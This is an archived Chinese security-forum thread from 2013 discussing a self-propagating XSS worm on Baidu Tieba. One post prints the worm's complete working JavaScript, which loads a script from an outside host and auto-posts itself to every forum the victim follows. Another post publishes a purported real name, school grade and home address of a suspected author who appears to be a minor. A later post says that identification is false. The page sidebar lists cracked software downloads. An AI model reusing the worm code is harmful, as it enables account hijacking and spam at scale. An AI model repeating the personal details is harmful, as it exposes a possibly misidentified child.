在贴吧被csrf了 | 漏洞人生

在贴吧被csrf了

2016-11-1 乌云zone - 永久存档 3771次访问

在贴吧被csrf了

liyang (<script>alert(“xss”)</script>) | 2013-05-19 17:31

点进来有..”,a:$.getScript(‘//xss.retaker.me/1.js’),a:”

题目都是这样的

本来以为是某个人测试的呢点开想回复一个我的cookies到你那了么

结果就发现自己的账号也发出了相似的帖子。。。

1#

穿精带淫 | 2013-05-19 17:32

看到了,很多贴吧都有这帖.
2#

momo | 2013-05-19 17:33

1111
3#

书生 (WooYun(白帽子技术社区)) | 2013-05-19 17:34

我勒个去，“我喜欢的贴吧”都会转发这条信息
4#

erevus | 2013-05-19 17:46

var forumName = [];
var forumId = []; for (var i = 0, j = 0; i < PageData.user.user_forum_list.info.length; i++) { if (PageData.user.user_forum_list.info[i].user_level > 3) { if (PageData.user.user_forum_list.info[i].forum_name!="璐村惂鐩戞帶") { forumName[j] = PageData.user.user_forum_list.info[i].forum_name; forumId[j] = PageData.user.user_forum_list.info[i].id; j++; } } } function madeit(myKw, myFid) { var c = rich_postor._getData(); c.content="\\u8bf7\\u5141\\u8bb8\\u6211\\u505a\\u4e00\\u4e2a\\u5fe7\\u4f24\\u7684\\u8868\\u60c5\\uff0c\\u662f\\u5fe7\\u4f24\\u54e6\\uff01"; c.ftid = c.fid; c.ptid = "2337372175"; c.title = '\\u70b9\\u8fdb\\u6765\\u6709..",a:$.getScript(\\'//xss.retaker.me/1.js\\'),a:"'; c.fid = myFid; c.kw = myKw; $.post("/relay/commit", c); } //now begin! for (j = 0; j < forumName.length; j++) { setTimeout("madeit('" + forumName[j] + "','" + forumId[j] + "')", 1500 * j);
}
5#

z7y (小胖子首席鉴黄师) | 2013-05-19 18:03

哈哈哈哈哈,好玩儿~
6#

呆子不开口 (求各种兼职) | 2013-05-19 18:14

为何说是csrf
7#

liyang (<script>alert(“xss”)</script>) | 2013-05-19 18:16

@呆子不开口要不是什么啊~~
8#

asdf (import pdb;pdb.set_trace(); name=”signature” type=”text” maxlength=”25″) | 2013-05-19 19:57

DOM XSS WORM http://weibo.com/1652595727/zxsFJ60bn
csrf方式来提交表单而已，但应该认为是XSS
9#

liyang (<script>alert(“xss”)</script>) | 2013-05-19 20:24

@asdf 额~~我是菜鸟~~我一直认为的是xss和csrf是一类的怎么区分呢~~xss只是窃取用户cookies等，而csrf是借助用户权限干别的事情~~
10#

猥琐 (http://blog.twodong.com) | 2013-05-19 20:39

因为这个好多人被封了
11#

海盗湾V | 2013-05-19 20:47

乌云白帽子干的http://www.wooyun.org/whitehats/retaker
12#

liyang (<script>alert(“xss”)</script>) | 2013-05-19 20:53

@海盗湾V 我在网上搜了搜他百度账号面包虫007 貌似之前也干过这事http://tieba.baidu.com/p/2204216052
13#
感谢(1)

梧桐雨 | 2013-05-19 20:57

@liyang csrf和xss是不一样的。虽然都属于前端hack
14#

海盗湾V | 2013-05-19 21:27

@liyang 面包虫007 ，真实姓名：王竟宇
年级，初一地址：济南章丘双山小区4栋17号
真的假的？
15#

erevus | 2013-05-19 23:00

@海盗湾V 不是他首发的
16#

retaker | 2013-05-20 08:47

@dtc 求解救………………
17#

retaker | 2013-05-20 08:49

@海盗湾V 当然是假的
18#

齐迹 (sec.zbj.com 欢迎来撸) | 2013-05-20 08:56

LZ 你的马赛克为什么不全打呢？
19#

liyang (<script>alert(“xss”)</script>) | 2013-05-20 11:21

@齐迹那其实就是我的账号，有哪里漏了么~
20#

半世倾尘 | 2013-05-20 12:19

比较牛逼
21#

null (生活不会像你想象得那么好，也不会像你想象得那么糟。) | 2013-05-20 18:00

这个虫子的行为是：一个用户中招后，就会在所有该用户收藏的贴吧中发帖。
22#

冉冉升起 (….ing) | 2013-05-24 21:47

看不来csrf想学啊！

在贴吧被csrf了

本文作者：Sofia

版权声明：除非本文有注明出处，否则转载请注明本文来自 https://www.vuln.cn

本文地址：https://www.vuln.cn/8057

评论(0) 引用(0)

沙发有屎，请自行备纸

发表评论：

生活累，一小半源于生存，一大半源于攀比。

与我联系：戳这里>>

搜索

热评文章
随机文章
最近更新
最新文章

2016-10-5 BurpSuite 1.7.11破解版下载【附多/新版本下载】

2016-11-5 Connectify Dispatch指定程序使用指定网卡[运维神器]

2014-3-25 网站备案流程_网站备案需要什么[简单明了解决备案各种问题]

2018-2-3 最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】

2016-11-8 php一句话后门的几种变形分析[preg_replace函数]

2016-10-24 Burp Suite使用介绍（二） - 小乐天

2016-10-24 恶意软件Linux/Mumblehard分析 - 杀戮

2016-10-24 Shodan搜索引擎介绍 - 修码的马修

2016-10-24 web服务器分层架构的资源文件映射安全以及在J2EE应用中的利用与危害 - shine

2016-11-1 OSX下JDK版本一键切换

2023-2-10 [网盘下载] GB/T 23031. 1 — 2022 工业互联网平台应用实施指南第一部分：总则.pdf

2023-2-7 [网盘下载] GB/T 41870-2022 工业互联网平台企业应用水平与绩效评价.pdf

2023-2-3 [网盘下载] GB/T 36323-2018 信息安全技术工业控制系统安全管理基本要求.pdf

2023-2-3 [网盘下载] GB/T 32919 -2016 信息安全技术工业控制系统安全控制应用指南.pdf

2023-2-2 GB/T 36466-2018 信息安全技术工业控制系统风险评估实施指南.pdf

2023-2-10 [网盘下载] GB/T 23031. 1 — 2022 工业互联网平台应用实施指南第一部分：总则.pdf

2023-2-7 [网盘下载] GB/T 41870-2022 工业互联网平台企业应用水平与绩效评价.pdf

2023-2-3 [网盘下载] GB/T 36323-2018 信息安全技术工业控制系统安全管理基本要求.pdf

2023-2-3 [网盘下载] GB/T 32919 -2016 信息安全技术工业控制系统安全控制应用指南.pdf

2023-2-2 GB/T 36466-2018 信息安全技术工业控制系统风险评估实施指南.pdf

最新评论

陆邀请码

test那个配置文件的路径在哪里啊

小山支持

Big Tree我和你一样的反应

8848666

友情链接